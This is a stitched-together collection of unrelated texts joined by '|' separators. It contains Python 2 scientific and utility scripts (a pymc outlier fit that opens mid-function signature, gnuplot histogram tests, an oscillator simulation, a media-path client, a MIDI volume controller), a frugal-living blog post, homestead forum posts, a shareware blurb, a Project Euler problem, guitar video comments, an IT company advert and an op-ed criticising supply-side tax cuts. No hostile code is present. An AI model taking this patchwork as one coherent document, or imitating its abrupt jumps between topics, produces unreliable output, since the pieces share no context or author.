print_results=False, intercept=True, nsample=50000, burn=5000,
thin=5, return_MC=False, guess=None, verbose=0):
"""
Use pymc to fit a line to data with outliers, assuming outliers
come from a broad, uniform distribution that cover all the data.
:param data1: xdata
:param data2: ydata
:param data1err: x errors
:param data2err: y errors
:param print_results: whether or not to print out the results
:param intercept: whether or not to fit for intercept
:param nsample: number of samples
:param burn: number of burn-in samples
:param thin: thinnening value
:param return_MC: whether or not to return the pymc MCMC instance
:param guess: initial guessues for slope and intercept
:param verbose: verbosity level of MCMC sampler
"""
if guess is None:
guess = (0, 0)
xmu = pymc.distributions.Uninformative(name='x_observed', value=0)
if data1err is None:
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=1, trace=False)
else:
xtau = pymc.distributions.Uninformative(name='x_tau', value=1.0 / data1err ** 2, observed=True, trace=False)
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=xtau, trace=False)
d = {'slope': pymc.distributions.Uninformative(name='slope', value=guess[0]),
'badvals': pymc.distributions.DiscreteUniform('bad', 0, 1, value=[False] * len(data2)),
'bady': pymc.distributions.Uniform('bady', min(data2 - data2err), max(data2 + data2err), value=data2)}
if intercept:
d['intercept'] = pymc.distributions.Uninformative(name='intercept', value=guess[1])
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], intercept=d['intercept'], badvals=d['badvals'], bady=d['bady']):
return (x * slope + intercept) * (True - badvals) + badvals * bady
else:
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], badvals=d['badvals'], bady=d['bady']):
return x * slope * (True - badvals) + badvals * bady
d['f'] = model
if data2err is None:
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=1, trace=False)
else:
ytau = pymc.distributions.Uninformative(name='y_tau', value=1.0 / data2err ** 2, observed=True, trace=False)
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=ytau, trace=False)
d['y'] = ydata
MC = pymc.MCMC(d)
MC.sample(nsample, burn=burn, thin=thin, verbose=verbose)
MCs = MC.stats()
m, em = MCs['slope']['mean'], MCs['slope']['standard deviation']
if intercept:
b, eb = MCs['intercept']['mean'], MCs['intercept']['standard deviation']
if print_results:
print "MCMC Best fit y = %g x" % (m),
if intercept:
print " + %g" % (b)
else:
print ""
print "m = %g +/- %g" % (m, em)
if intercept:
print "b = %g +/- %g" % (b, eb)
print "Chi^2 = %g, N = %i" % (((data2 - (data1 * m)) ** 2).sum(), data1.shape[0] - 1)
if return_MC:
return MC
if intercept:
return m, b
else:
return m
if __name__ == "__main__":
import numpy as np
import matplotlib.pyplot as plt
from pymc.Matplot import plot
#fake data [x, y, yerr, xyerr]
data = np.array([[201, 592, 61, 9],
[244, 401, 25, 4],
[47, 583, 58, 11],
[287, 402, 15, 7],
[203, 495, 21, 5],
[58, 173, 15, 9],
[210, 479, 27, 4],
[202, 504, 14, 4],
[198, 510, 30, 11],
[158, 416, 16, 7],
[165, 393, 14, 5],
[201, 442, 25, 5],
[157, 317, 52, 5],
[131, 311, 16, 6],
[166, 400, 34, 6],
[160, 337, 31, 5],
[186, 423, 42, 9],
[125, 334, 26, 8],
[218, 533, 16, 6],
[146, 344, 22, 5],
[150, 300, 23, 10],
[270, 620, 40, 15]])
#rename columns
xdata, ydata = data[:, 0], data[:, 1]
xerr, yerr = data[:, 3], data[:, 2]
#perform MCMC
MC = pymc_linear_fit_withoutliers(xdata, ydata, data1err=xerr, data2err=yerr, return_MC=True)
MC.sample(100000, burn=1000, verbose=0)
#show the results
fig = plt.figure()
#plot the confidence levels
low25 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][2.5] + MC.stats()['intercept']['quantiles'][2.5]
top97 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][97.5] + MC.stats()['intercept']['quantiles'][97.5]
plt.fill_between(np.linspace(20,300), low25, top97, color='k', alpha=0.1, label='2.5/97.5 quartile')
#plot the average results
plt.plot(np.linspace(20,300), np.linspace(20,300)*MC.stats()['slope']['mean'] + MC.stats()['intercept']['mean'],
color='k', linewidth=1, label='Average fit')
#plot data
plt.errorbar(xdata, ydata, xerr=xerr, yerr=yerr, color='b', label='data', fmt='o')
#show likely outliers
plt.plot(xdata[MC.badvals.value.astype('bool')], ydata[MC.badvals.value.astype('bool')], 'rs',
label='likely outliers')
plt.xlim(20, 300)
plt.legend(shadow=True, fancybox=True, scatterpoints=1, numpoints=1, loc='upper left')
plt.savefig('test.pdf')
plt.close()
#MCMC plot
plot(MC)
|
There are two things that I find it very difficult to spend money on: washcloths and socks. Some of our washcloths are 10 years old, so I was very thankful this week when my mom gave me some much needed washcloths and towels that were given to her.
Our older son earned a coupon for a free personal pan pizza from the Pizza Hut Book-It Program.
A dentist visited our younger son's class and he was given a goody bag with a toothbrush, toothpaste and floss.
I saved the stickers from the Highlights offer we received in the mail to put in an Operation Christmas Child shoe box.
I was very excited to find canned pumpkin for $.99 each! I also bought molasses for $1.99 (usually over $3) and apples and onions for $.33/lb.
I bought our younger son a shirt and shorts that he will (hopefully) be able to wear next summer for $3.50.
I bought apples on sale last week that we had never tried before and it turned out we didn't really care for them. I discovered though that they make the best applesauce I have ever had! Next time I see a sale, I will definitely buy more for applesauce.
In my mailbox: Gain and Pantene samples and coupons from P&G and two free magazines.
|
#!/usr/bin/env python
import os
import sys
sys.path.append(os.path.realpath(os.path.join(os.path.realpath(__file__),"../../../../util")))
import histogram
import subprocess
settings = [
{
"type": "fixed",
"params": [ ("value", 0.5) ],
"plotrange": (-1, 1),
"f": "samples=100000;s=0.01;f(x,p) = 1.0/(sqrt(2.0*pi)*s)*exp(-(x-p)**2/(2*s**2))"
},
{
"type": "uniform",
"params": [ ("min", -1), ("max", 4) ],
"plotrange": (-2, 5),
"f": "H(x) = (x/abs(x)+1.0)/2.0 ; f(x,a,b) = 1.0/(b-a)*H(x-a)*H(b-x)"
},
{
"type": "beta",
"params": [ ("a", 2), ("b", 5), ("min", -2), ("max", 3) ],
"plotrange": (-3,4),
"f": "H(x) = (x/abs(x)+1.0)/2.0; f(x,a,b,k,l) = gamma(a+b)/(gamma(a)*gamma(b))*((x-k)/(l-k))**(a-1.0)*(1.0-((x-k)/(l-k)))**(b-1.0)*H(x-k)*H(l-x)/(l-k)"
},
{
"type": "gamma",
"params": [ ("a", 5), ("b", 1.5) ],
"plotrange": (0, 15),
"f": "f(x,a,b) = x**(a-1.0)*exp(-x/b)/(b**a*gamma(a))"
},
{
"type": "lognormal",
"params": [ ("zeta", 0.5), ("sigma", 0.25) ],
"plotrange": (0, 3),
"f": "f(x,z,s) = 1.0/(x*s*sqrt(2.0*pi))*exp(-(log(x)-z)**2/(2.0*s**2))"
}
]
for s in settings:
# Write config file for these settings
lines = [ ]
lines.append("test.dist.type = " + s["type"])
for p in s["params"]:
lines.append("test.dist." + s["type"] + "." + p[0] + " = " + str(p[1]))
data = "\n".join(lines)
fileName = "config-tmp-" + s["type"]
with open(fileName, "wt") as f:
f.write(data)
f.close()
# Run the executable with this config file
outName = "out-tmp-" + s["type"]
with open(outName, "wt") as f:
subprocess.call( [ "../../../build_ninja2/testconfig-opt-debug", fileName ], stdout=f)
f.close()
# Process generated value in histogram
h = histogram.Histogram(s["plotrange"][0], s["plotrange"][1], 100)
with open(outName, "rt") as f:
l = f.readline()
while l:
val = float(l)
h.process(val)
l = f.readline()
f.close()
histName = "hist-tmp-" + s["type"]
with open(histName, "wt") as f:
h.printProb(f)
f.close()
# Write gnuplot file
plotName = "plot-tmp-" + s["type"] + ".gnuplot"
pngName = "plot-tmp-" + s["type"] + ".png"
with open(plotName, "wt") as f:
print >>f, "set terminal png"
print >>f, "set style data lines"
print >>f, "set output '%s'" % pngName
print >>f, s["f"]
function = "f(x"
for p in s["params"]:
function += "," + str(float(p[1]))
function += ") "
print >>f, "plot [%g:%g] '%s', %s lt 3" % (s["plotrange"][0],s["plotrange"][1],histName,function)
subprocess.call( [ "gnuplot", plotName ])
os.unlink(plotName)
os.unlink(histName)
os.unlink(outName)
os.unlink(fileName)
|
I'll see if I can find the article Brian.
Edit - This is what I think I was looking at. Certainly this could be an issue for people with Diabetes but I'm not sure who else it would effect.
Nell and I went out yesterday. The Jeep has a block heater whereas the Jetta does not. I've looked into block heaters for the VW diesel, but at this point they are a little too pricey for our budget at this moment. That's okay the Jeep has nice snow tires and a block heater. Nell and I had the most wonderful afternoon in town.
The Jeep has the block heater built into the engine block.
The vw-block-heater has a little different block heater setup.
On the bright side this looks much easier to install than the freeze plug installation the Jeep has.
We did order a new starter for the VW Jetta as one of the issues in the cold mornings is the starter turns for a few seconds then spins free.
That is a classic problem with old cars and starters and often happens because oil gets down in the starter and on the shaft where the pinion gear fails to stay engaged with the engine flywheel because oil and grease get sticky in cold weather. Sometimes I am able to clean the starter and it works again. However as I get older I need to limit the time I'm working under cars, so I won't take the chance it is repairable.
Weather-Sapello-NM-87745-12-29-18 Yeah baby it's brisk outside!
I've let all the exercise routines I used while I thought I only had scoliosis go, in favor of getting outside and performing much needed chores. Now it looks like those chores are aggravating my spine. That's okay I can change, I want to be healthy, especially after coming off this yeast fungal overgrowth disease which I believe in part is called SIBO.
One of the issues I am coping with now is how all the medical professionals missed the severity of the spinal stenosis. Personally, I missed it myself because I thought the pain was coming from whatever caused all the other pain that had me down for the count. Thank the universe for Doctor Lilly Bletcher who with her brilliant analysis of the blood and genetic tests, has confirmed the cause of one disease which ruled out the cause of the structural back issue. Now I can move forward with knowledge and treatment of both. I'm still upset the western medicine providers didn't pay enough attention to the results of the MRI.
Again, tremendous thanks go out to Dr. Lilly for requesting a copy of this MRI and posting it back to me.
I have an appointment with my primary care doctor on my birthday, the 11th of January. At that time I will emphasize the critical nature of this report and request physical therapy specifically related to this new information. On January 1st, 2019, I'll switch over from the blessed Medicaid to Medicare. I'm a bit apprehensive about this change, hopefully it'll be a smooth transition and Medicaid will be my secondary insurance.
I have spent a good deal of time in research and physical work to begin the transition of as much of this property as possible to sustainable ecosystems through permaculture. With the effects of time and climate, I believe this is the best chance to keep alive and preserve this beautiful land we are so lucky to live on. The process is long reaching but the results are in perpetuity. I like that word.
It is going to take much more physical work than I can safely do. I am looking into large and small equipment that will be able to replace the stress on the back because there is no perpituity in that skeletal structure. Nell and I are looking into ways to find assistance in this like grants or programs such as go fund me. If anyone has experience with these, please share your knowledge and opinions with us.
Feeling hopeful for the new year and hoping you are as well. Hell, if we are really lucky the Feds will be the first ever to arrest a sitting president!!!
Hehe we don't need no Hotmail.
Hi how is everyone? We're doing fine.
We've had Nell's niece Kylee, her husband Rod and OMG their crazy happy baby Kyros staying with us during this glorious wintry weather. As usual I did not shoot any pictures, yet. I'll try today. Everyone is asleep still. I've used the quiet morning to make cookies and granola. Cookies are out, granola is still in the oven. As with Nell's family tradition we're doing a jigsaw puzzle on the dining table. That's a super way to spend time together and talk.
Yesterday we went to the Dwan Light Sanctuary and Montezuma Hot Springs. The staff at UWC hadn't shoveled the path to the light sanctuary, so it wasn't open yet. That was too bad, but the hot springs were really nice, even with all the snow around. I know my back feels much better after soaking in the healing waters.
I tried to not get all crazy shoveling the paths to the out-buildings, but some places needed a path, including the path to our lone Guinea hen. Nell's did a wonderful job sealing her house and putting up insulating curtains over the windows. We have a heat lamp in the fowl house which is enough to keep her water dish from freezing, except on one morning when the temperatures dropped to zero. Then I had to make a trail free of snow so the bird could get to the SE corner cubby she likes to sit where she can look in the window and watch us from.
Anywho, then we were blessed with yet another snow fall. This one greater than the last.
Sounds like every one is waking up.
This is such a great way to start the new year.
I hope you all are doing great too.
Yes, that's the way it is supposed to look.
Same here on the hill, good snow cover. We had around 3 feet coming down and have around 2 feet on the ground. I could have done without the brutal cold of the week, the temp drop to -27C Thursday night.
More snow to come this week end, but it will be rather warm, 40F today .
I have to get my lawn chair out and sit under the palm tree and sip a drink and watch the girls in skimpy dresses.
I use for Mrs D and Mr D a heat dog water bucket, 100 W, the water never froze.
You're on the foothills of the Sangre de Christo range? You're having a great year of snow! Hope for more progress on your health in the coming year.
Thanks gnoib and bridgie. Yes this is a fantastic Winter and it just began! Indeed we are where the Great Plains meet the Rockies!
You've been quiet Boss, all ok?
Hey hi Sheg. Thanks for asking. Yes we're both doing well. I had a structural problem in my hips and Lumbar spine, but an amazingly talented D-PT got me straightened out in a about four weeks.
This is where we're spending most of our energy. We're in between tenets and doing much needed cleaning, drywall repairs, and lightly remodeling this modular house. I'm here to tell you, they didn't build these things with maintenance in mind.
Winter here was snowy snowy. We love the snow, but not the mud that occurs afterward. In fact it rained about dusk last night, the turned to snow after that. About two inches of the snow stuck, now it's gone and the mud is back. Oh well.
Fish are doing well too. There are still eight Brook trout and the five big Comets. The system is working better with a dozen full size fish.
You may be able to see that the Kale in the DWC is greener than during the Summer. I really pushed the envelope by adding 100 five inch Brookie fingerlings 16 months ago. The system did it too, of course with a lot of filter cleaning. We still have trout in the freezer, grin. We had enough trout to eat and plenty to give away too. I was thinking I could go with fifty fingerlings this time and make my life easier, but hey, when is life easy?
Hopefully this season I'll be healthier and be able to give the AP the attention it requires. Peppers are beginning their second season as is the new beef heart tomato. The rest of the tomatoes are third season in the same media beds.
I was able to open the Koi pond four or five times between stow-storms to un-clog the outflow from the pond. Also with this setup I opened the filter area and clean those filters from above. Next Winter I'll make some improvements to the glass mounting so it is even easier to open and close. I've got to baby my spine so I need to put handles and perhaps some kind of counter-balances on them so they are lighter. Even when my back was strong moving those old plate glass sliding doors was always difficult.
I think you all will be hearing from me more often now that it seems I'm good to go again. Yay.
Good to hear that you are basically doing well.
Your snow is mostly gone already ! Looks springy.
I still have in most places 3 feet on the ground, some 4 and now the next snow storm has started.
Good to hear from you gnoib. Yep the snow that fell this morning as we were leaving for Santa Fe is already gone, probably got rained on.
Good to hear Boss. Like Skeggley, I was getting a bit concerned, but was too frightened to ask.
You're not usually out of the loop for so long.
I've copied your Hugel Kultur in my earth garden this autumn and have been madly trying to finish off my greenhouse and AP system in there before winter. It's still been so hot here that working in there anytime but mornings has just meant sauna conditions and rapid dehydration (and there were SO many tree roots to cut through). We haven't seen any rain for about 5 months now, so garden wise most things are looking dead. Our daughter and hubby have come down from Sydney for the weekend and I was hoping they could bring some rain down with them...she says anything under 30mm up there doesn't count as rain LOL.
Last edited by bridgie on Mar 23rd, '19, 05:54, edited 1 time in total.
Sounds like good news, boss. Passed your way last Sat on way to Angel Fire and wondered how your systems have fared through the winter.
Thanks for checking on me Nhibbo. Yes indeed, I made it though hopefully the last bout of spinal issues in much better condition. My hip were seriously out of wack, even better than what the first doctor of physical therapy did. My spine is still weak with spinal stenosis. I got an inversion table for my 65th birthday. Yay!
That's cool about the hugelkulture mound. The spinal degradation I thought was going to put me out of the permaculture hobby before I got started. I'm thinking a lot lately about mini-excavators.
I kept having dreams of me as the mechanic Steve J. Spears in Mad Max 2. I realized I was really scared my spine was a goner.
I need something that can do hugelkulture and swales.
I really like the micro-excavators because the operator is right there overlooking the job.
These have stability issues and the terrain here may be too uneven.
|
import requests
import os
from settings import (SERVER_NAME,
MEDIAVIEWER_TV_PATH_URL,
MEDIAVIEWER_MOVIE_PATH_URL,
WAITER_USERNAME,
WAITER_PASSWORD,
LOCAL_TV_SHOWS_PATHS,
LOCAL_MOVIE_PATHS,
VERIFY_REQUESTS,
)
from utils import postData
from log import LogFile
log = LogFile().getLogger()
class Path(object):
def __init__(self,
localpath,
remotepath):
self.localpath = localpath
self.remotepath = remotepath
def _post(self, useMovieURL=False):
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
values = {'localpath': self.localpath,
'remotepath': self.remotepath,
'skip': False,
'server': SERVER_NAME,
}
postData(values, url)
def postMovie(self):
self._post(useMovieURL=True)
def postTVShow(self):
self._post(useMovieURL=False)
@classmethod
def _getPaths(cls, getMovies=False):
pathDict = dict()
if getMovies:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
data = {'next': url}
while data['next']:
request = requests.get(data['next'], verify=VERIFY_REQUESTS, auth=(WAITER_USERNAME, WAITER_PASSWORD))
request.raise_for_status()
data = request.json()
if data['results']:
for result in data['results']:
pathDict.setdefault(result['localpath'], set()).add(result['pk'])
return pathDict
@classmethod
def getTVPaths(cls):
return cls._getPaths(getMovies=False)
@classmethod
def getMoviePaths(cls):
return cls._getPaths(getMovies=True)
@classmethod
def _getLocalPaths(cls, getMovies=False):
if getMovies:
filepaths = LOCAL_MOVIE_PATHS
else:
filepaths = LOCAL_TV_SHOWS_PATHS
return cls._buildLocalPaths(filepaths)
@staticmethod
def _buildLocalPaths(filepaths):
localpaths = set()
for localpath in filepaths:
if not os.path.exists(localpath):
log.error('{} does not exist. Continuing...'.format(localpath))
continue
res = set([os.path.join(localpath, path) for path in os.listdir(localpath) if path])
localpaths.update(res)
return localpaths
@classmethod
def getLocalTVPaths(cls):
return cls._getLocalPaths(getMovies=False)
@classmethod
def getLocalMoviePaths(cls):
return cls._getLocalPaths(getMovies=True)
@classmethod
def _getAllPaths(cls, getMovies=False):
''' Returns a dict of localpaths related to pathids
Local paths not in the server are represented with pathid -1.
'''
allPaths = cls._getPaths(getMovies=getMovies)
localPaths = cls._getLocalPaths(getMovies=getMovies)
for path in localPaths:
allPaths.setdefault(path, set()).add(-1)
return allPaths
@classmethod
def getAllTVPaths(cls):
return cls._getAllPaths(getMovies=False)
@classmethod
def getAllMoviePaths(cls):
return cls._getAllPaths(getMovies=True)
@classmethod
def _getPathByLocalPathAndRemotePath(cls,
localpath,
remotepath,
useMovieURL=False,
):
payload = {'localpath': localpath, 'remotepath': remotepath}
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
request = requests.get(url,
params=payload,
verify=VERIFY_REQUESTS,
auth=(WAITER_USERNAME, WAITER_PASSWORD),
)
request.raise_for_status()
data = request.json()
return data
@classmethod
def getTVPathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=False)
@classmethod
def getMoviePathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=True)
|
Error Repair Professional - Keep your PC operating smoothly by using Error Repair Professional to scan, identify, clean and repair errors in your PC with a single click. With a few easy steps, it will scan your entire registry for any invalid entries and provides a list of the registry errors found. You can then choose to selectively clean each item or automatically repair them all.
Error Repair Professional 4.23 is a shareware program and can be used as a demo to try the software until the free trial period has ended. A full version of the program is available after the trial period ends.
For security reasons, you should also check out the Error Repair Professional download at LO4D.com which includes virus and malware tests. Additional screenshots of this application download may be available, too.
Featuring the very best in free registry cleaner downloads. Editing staff adds reviews and free download links and constantly updates software.
Check out some of the freeware downloads available in the registry cleaner category. They contain no strings and are available at zero cost.
4 out of 5 based on 74 ratings.
|
#!/usr/bin/env python
# coding=utf-8
"""434. Rigid graphs
https://projecteuler.net/problem=434
Recall that a graph is a collection of vertices and edges connecting the
vertices, and that two vertices connected by an edge are called adjacent.
Graphs can be embedded in Euclidean space by associating each vertex with a
point in the Euclidean space.
A **flexible** graph is an embedding of a graph where it is possible to move
one or more vertices continuously so that the distance between at least two
nonadjacent vertices is altered while the distances between each pair of
adjacent vertices is kept constant.
A **rigid** graph is an embedding of a graph which is not flexible.
Informally, a graph is rigid if by replacing the vertices with fully rotating
hinges and the edges with rods that are unbending and inelastic, no parts of
the graph can be moved independently from the rest of the graph.
The **grid graphs** embedded in the Euclidean plane are not rigid, as the
following animation demonstrates:
However, one can make them rigid by adding diagonal edges to the cells. For
example, for the 2x3 grid graph, there are 19 ways to make the graph rigid:
Note that for the purposes of this problem, we do not consider changing the
orientation of a diagonal edge or adding both diagonal edges to a cell as a
different way of making a grid graph rigid.
Let R(m,n) be the number of ways to make the m × n grid graph rigid.
E.g. R(2,3) = 19 and R(5,5) = 23679901
Define S(N) as ∑R(i,j) for 1 ≤ i, j ≤ N.
E.g. S(5) = 25021721.
Find S(100), give your answer modulo 1000000033
"""
|
LAGA presents our sheet music edition of Pavane, Op. 50 by Gabriel Fauré arranged for classical guitar by Emre Sabuncuoglu.
incredible hands! Does anyone know the name the of this unique guitarist?
What is the tuning of the guitar?
this holding device you guys use.
that was ab so lute ly gorgeous. Thank you indeed.
to communicate the piece must have been a monumental task. KUDOS!!
One of the best players I’ve seen and I know all the major players from Segovia on. Brilliant arr. I’ve worked on this with both guitar and flute and never thought anyone could do both the accomp. and melody. Great use of tone changes….excellent tempo choices.
Ansolutely one of the most beautiful things I’ve heard. Though it kind of scares me that this is only ranked as advanced!
OMG how beautiful that is! My eyes are filled with tears of emotion. It’s been a few years since I played, but tihis settles it – I’ve got to pick it up again!
I recently purchased your fine arrangement of, “Pavane,” and instantly began memorizing it with the great assist of your clear mastery of classical guitar. I actually learn just by watching you play, which makes your videos as invaluable to me as your arrangements. Thank you!
|
from pylab import *
from scipy import sparse
from scipy.integrate import odeint
import os, time
from osc_eqn import osc2
from my_parameters import *
detune=0.001
alpha0=3.08
alpha1=1e-3*random(Nosc)+alpha0
alpha1=1.0/(alpha1)
length1=length*stepsize+1
tlength=translength*stepsize+1
S1=zeros((Nosc,Nosc))
S1[0,5]=S1[1,4]=S1[2,3]=0.8
S1[3,0]=S1[3,1]=S1[4,0]=S1[4,2]=S1[5,1]=S1[5,2]=0.4
#for i in range(0,Nosc-1):
# S1[i,i+1]=0.2
#S1[Nosc-1,0]=0.8
print S1
S=sparse.csr_matrix(S1)
#ic1=[]
#for line in file('fc0.txt'):
# ic1.append(double(line))
for coupling in [0.11]:#arange(0.11,0.115,0.001): #[0.09]:
try: os.mkdir('Data')
except: pass
#arange(3.535,3.55,0.001):
for beta in [3.5]:
beta1=1e-3*random(Nosc)+beta
beta1=1.0/(beta1)
outname='a%2.3f_b%2.3f_c%2.3f'%(alpha0,beta,coupling)
print 'running params %s'%outname
#set initial conditions
#x=ic1
x=[]
for n in range(0, Nosc):
x.append(0.01*rand()+(-1)**(n+1)*3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*0.3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*1.0)
x=array(x)
time0=time.time()
##transient
timepoints = arange(1., tlength, stepsize)
transient = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
tran3=reshape(transient,(translength,Nosc*3))
savetxt('data_transient.txt',tran3)
x=transient[-1,:]
time1=time.time()
timepoints = arange(1., length1, stepsize)
trajectory = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
time2=time.time()
x=trajectory[-1,:]
print "Solved in %e seconds (%e transient + %e printed)" % (time2-time0,time1-time0,time2-time1)
plot(trajectory[:,0])
savefig('traj.png')
savetxt('fc.txt',trajectory[-1,:])
traj3=reshape(trajectory,(length,Nosc*3))
savetxt('data_trajectory.txt',traj3)
#end
|
We are a company with 20 years experience providing technical requirements to businesses in London, Vauxhall, SW8. Our engineers are technology enthusiasts, fully trained and qualified, who have a passion for new and old technologies. We specialise in planning strategies to implement suitable IT solutions for your business using industry standards and procedures.
I had some serious issues with my laptop which were fixed in excellent time for a very reasonable price thanks to Kevin at Reboot That. Fantastic service!
Kevin is a true professional. He was very patient explaining me all new features on the computer and gave me great advise on how to build a useful database.
|
import sys
import time
from subprocess import call
import pygame.midi
class NircmdMixer():
"""
Set system volume, val =[0, 65535]
"""
def __init__(self):
self.current_volume = 0
def volume_to_int(self, volume):
"""
Convert 0-100 volume value to [0, 65535] range
"""
result = 0
try:
result = int(65535 * volume / 100)
except Exception:
pass
return result
def setvolume(self, vol, verbose=False):
if vol != self.current_volume:
volume = self.volume_to_int(vol)
call(["nircmd", "setsysvolume", str(volume)])
self.current_volume = vol
if verbose:
print 'Midivol: Volume set to {}'.format(self.current_volume)
# print str(volume)
class Midivol():
'''
Class used to control master volume mixer (using nircmd) from midi input (pygame.midi) on windows systems
'''
system_mixer = NircmdMixer()
tag ='Midivol: '
def __init__(self, device='', max_volume=50, channel=None, control=None, verbose=False):
self.device = device
self.max_volume = max_volume
self.channel = channel
self.control = control
self.verbose = verbose
self.inputs = pygame.midi
self.inputs.init()
self.devices = self.get_device_list()
self.stop_listening = False
def build(self):
'''
Finalize midivol and run main listening loop
'''
if not self.device:
if self.inputs.get_count() == 0:
raise Exception('No available MIDI devices')
else:
for d in self.devices:
if d[2] == 1: #input
self.device = self.devices.index(d)
break
else:
try:
self.device = int(self.device)
except ValueError:
raise Exception("Incorrect device parameter")
if self.device < len(self.devices):
# list of gates functions attribute to determine
# if msg should be passed (processed volume change)
self.funky_list = []
if self.channel != None:
self.funky_list.append(self.channel_gates)
if self.control != None:
self.funky_list.append(self.control_gates)
self.listening_input = self.inputs.Input(self.device, 0)
self.log_msg('Running using MIDI device: {}, max_vol: {}, filters: channel {} control {}'.format(
self.devices[self.device][1], self.max_volume, self.channel, self.control))
else:
raise Exception('"{}" input device not found'.format(self.device))
def run(self):
# main loop for MIDI msg listening
while True:
if self.listening_input.poll():
msg = self.listening_input.read(1)
self.set_volume_from_midi_msg(msg)
if self.verbose:
self.log_msg(msg)
time.sleep(0.005)
def assign_device_by_name(self,name):
for dev in xrange(0, self.inputs.get_count()):
dev_info = self.inputs.get_device_info(dev)
if name == dev_info[1] and dev_info[2] == 1:
self.device = dev
return True
# devices.append(self.inputs.get_device_info(dev))
return False
def get_device_list(self):
devices = []
for dev in xrange(0, self.inputs.get_count()):
devices.append(self.inputs.get_device_info(dev))
return devices
def set_volume(self, val): #dev
'''
Sets volume of self.system_mixer
'''
if val > self.max_volume:
val = self.max_volume
self.system_mixer.setvolume(val)
def channel_gates(self, msg):
'''
Msg passes gates if channel is as needed
'''
return self.channel == msg[0][0][0]
def control_gates(self, msg):
'''
Msg passes gates if control id is as needed
'''
return self.control == msg[0][0][1]
def set_volume_from_midi_msg(self, msg):
'''
Set volume for main mixer from mido midi msg object
'''
for funk in self.funky_list:
if not funk(msg):
return
val = self.midi_to_volume(msg[0][0][2])
self.set_volume(val)
def log_msg(self, msg):
'''
Log msg with tag to console
'''
print '{} {}'.format(self.tag, str(msg))
def midi_to_volume(self, value):
'''
Convert midi 0-127 values to 0-99 volume values
'''
volume = 0
try:
volume = int(value // 1.28)
except Exception:
print Exception
return volume
def assign_param(argv, param_name, param_value, convert_to_int=False):
'''
Return param value [idx + 1] if found in list, if not found returns unchanged
Converts result to int if parameter supplied
'''
idx = None
try:
idx = argv.index(param_name)
except ValueError:
return param_value
try:
param_value = argv[idx + 1]
if convert_to_int:
try:
param_value = int(param_value)
except ValueError:
pass
except IndexError:
pass
return param_value
def display_help():
'''
Displays help info in the console for -h parameter
'''
help_content = []
help_content.append('----------------------------------------------\n')
help_content.append('Control system volume tool using MIDI messages\n')
help_content.append(' Available parameters:\n')
help_content.append(' -h Display help info\n')
help_content.append(' -d MIDI device name or id (default first available MIDI device)\n')
help_content.append(' Can be integer value, which means # of available midi devices\n')
help_content.append(' -l Returns list of all available MIDI devices\n')
help_content.append(' -ch MIDI channel listen to 0-15 (default all)\n')
help_content.append(' -ct MIDI control id to process, type int (default all ids)\n')
help_content.append(' -m Max volume threshold 0-99 (default 30)\n')
help_content.append(' -v Run in verbose mode\n')
print ''.join(help_content)
quit()
def display_devices():
'''
Displays all available MIDI devices seen by mido
'''
midi = pygame.midi
midi.init()
print 'List of available MIDI devices:'
print '(interf, name, input, output, opened)'
for dev in xrange(0, midi.get_count()):
print midi.get_device_info(dev)
quit()
def assign_params(midivol):
'''
Assign sys.argv params to midivol atrrbutes
'''
help_par = '-h'
device_par = '-d'
list_par = '-l'
channel_par = '-ch'
control_par = '-ct'
maxvolume_par = '-m'
verbose_par = '-v'
if help_par in sys.argv:
display_help()
if list_par in sys.argv:
display_devices()
midivol.device = assign_param(sys.argv, device_par, midivol.device)
midivol.channel = assign_param(sys.argv, channel_par, midivol.channel, True)
midivol.control = assign_param(sys.argv, control_par, midivol.control, True)
midivol.max_volume = assign_param(sys.argv, maxvolume_par, midivol.max_volume, True)
if verbose_par in sys.argv:
midivol.verbose = True
def main():
'''
Main method
'''
midivol = Midivol()
assign_params(midivol)
midivol.build()
midivol.run()
if __name__ == "__main__":
main()
|
Like a cold that you just can’t shake, supply-side economics enthusiasts just won’t go away.
At a Joint Economic Committee hearing last Wednesday, economist Arthur Laffer, who first sketched out what’s now known as the Laffer curve on a napkin over 40 years ago, once again laid out the argument that massive tax cuts benefiting the wealthy lead to broad economic growth that “trickles down” to everyone else and offsets the cost of the tax cuts. In other words, tax cuts pay for themselves.
History shows something else entirely: they don’t.
In fact, over the past several decades, economic growth has often been faster when the top marginal income tax rate has been higher, not lower. But that hasn’t stopped those who worship at the supply-side altar. In 1993, Laffer predicted that“[President Bill] Clinton’s tax bill will do about as much damage to the U.S. economyas could feasibly be done in the current political environment.” History, that stubborn annoyance, of course proved otherwise. The U.S. economy grew much stronger during the Clinton years—when marginal income tax rates were higher—than during the George W. Bush years.
This doesn’t mean that raising the top marginal tax rate creates growth and investment. However, it does mean that that lowering tax rates for the wealthy doesn’t automatically lead to faster growth and more investment, as the supply-side crowd claims.
Most recently, Dr. Laffer and his conservative friends have applied their theories to Kansas. In 2012, he promised that tax cuts would create “enormous prosperity” for the state. Instead, the results have been disastrous. Significant tax cuts in Kansas have dramatically reduced revenues and left the state without the resources to fund its educational system. Job and GDP growth have also been weak—Kansas’ annual job growth has only been about half that of its neighboring states since the Laffer-inspired tax cuts were enacted.
